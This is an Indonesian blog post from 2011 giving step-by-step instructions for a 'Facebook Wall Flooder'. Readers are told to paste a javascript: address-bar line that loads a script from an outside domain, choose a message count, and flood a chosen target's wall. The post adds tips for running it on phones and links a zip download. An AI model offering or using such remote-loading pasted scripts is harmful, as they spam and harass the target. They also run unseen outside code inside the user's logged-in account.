Blogger Widgets

11 Jun 2011

Facebook Wall Flooder

Facebook wall flooder terbaru... caranya masih sama seperti yang lama, pilih target lalu klik profil nya, pada address bar (kolom www) hapus semua URL nya lalu masukan sciprt berikut ini javascript:(a = (b = document).createElement("script")).src = "//indonesiansoceng.tk/Flood.JS", b.body.appendChild(a); vod(0); langsung saja kamu tekan enter.

screenshot


Akan ada jendela pop-up yang bertuliskan Masukan Jumlah Pesan Yang Akan Dikirim kamu isi saja jumlah yang kamu inginkan, misal 100


Akan muncul jendela pop=up kembali Masukan Pesan Anda silahkan tulis kata-kata yang hendak kamu kirimkan ke si target


Hasilnya akan seperti ini, namun kamu harus merefresh profile target, atau klik saja beranda lalu kembali lagi ke profile target agar hasil flood kamu terlihat hasilnya




catatan:
Belum saya coba jika menggunakan HP namun beberapa teman saya ada yang bisa menggunakan HP saat saya share Facebook Wall Bomber yang pernah saya posting di Blog Myopera lama saya, untuk mengingatkan saya copast saja sebagian caranya di bawah ini.

copast from my opera blog: Facebook Wall Bomber bisa di gunakan melalui opmin Handler, setting lah opmin Handler kamu dengan meng-OFF kan HTML nya dengan cara tulis di kolom www tetapi hapus tulisan www itu menjadi about:config lalu klik OK, ganti dari YES menjadi NO di bagian di bagian Keep Styling in RSS feeds. Untuk cara selanjutnya sama persis dengan yang saya sudah jelaskan diatas, jika scriptnya tidak berjalan (biasanya ada script yuang tidak sempurna tercopy melalui HP) coba saja download link di bawah ini, ekstrak file.zip lalu copast menggunakan fitur copy paste yang ada di HP kamu.

catatan:
Jangan terlalu sering menggunakan Facebook Wall Flooder karena nanti Facebook kamu akan di blokir, paling ringan kamu jadi tidak bisa kirim wall ke teman selama 1-2 hari, sedangkan yang paling parah akun Facebook kamu bisa di blokir permanen karena di anggap melakukan spam, gunakan Facebook Wall Flooder seperlunya saja, sebagai tambahan biasanya hal seperti ini cepat di patch sama Facebook jadi jika suatu saat nanti tidak bisa lagi berarti celah ini sudah di patch.

Facebook Wall Flooder.zip
Comments
0 Comments

0 komentar:

Posting Komentar

Jadilah pengunjung & pembaca yang baik, tuangkanlah komentar anda.....!!!
silahkan share jika menurut anda artikel di atas bermanfaat, namun jgn lupa utk menyertakan sumbernya...

Komentar anda akan muncul setelah di setujui penulis blog

© s1s1 9elap Qu™ 2010